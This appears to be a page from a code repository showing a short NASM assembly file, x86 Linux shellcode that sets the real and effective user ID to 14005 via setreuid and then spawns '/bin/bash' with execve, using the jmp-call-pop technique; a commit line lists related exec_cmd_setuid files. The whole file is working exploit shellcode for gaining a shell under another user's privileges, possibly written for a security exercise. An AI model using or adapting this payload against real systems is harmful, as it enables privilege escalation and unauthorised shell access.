0c7b4ed751
new file: exec_cmd/shell new file: exec_cmd/shell.asm new file: exec_cmd/shell.o new file: exec_cmd_setuid/makefile new file: exec_cmd_setuid/shell new file: exec_cmd_setuid/shell.asm new file: exec_cmd_setuid/shell.o
29 lines
401 B
NASM
29 lines
401 B
NASM
global _start
|
|
_start:
|
|
jmp short data
|
|
|
|
exploit:
|
|
|
|
xor edx, edx
|
|
|
|
xor eax, eax ; set reuid
|
|
xor ebx, ebx
|
|
xor ecx, ecx
|
|
mov al, 203
|
|
mov bx, 14005
|
|
mov cx, 14005
|
|
int 0x80
|
|
|
|
xor eax, eax
|
|
xor ebx, ebx
|
|
xor ecx, ecx
|
|
pop edx
|
|
mov [edx + 10], eax
|
|
mov al, 11
|
|
mov ebx, cmd
|
|
int 0x80
|
|
|
|
data:
|
|
call exploit ; this puts the address of where we're at (where the string is!) in the stack and jmps to start
|
|
cmd: db '/bin/bash'
|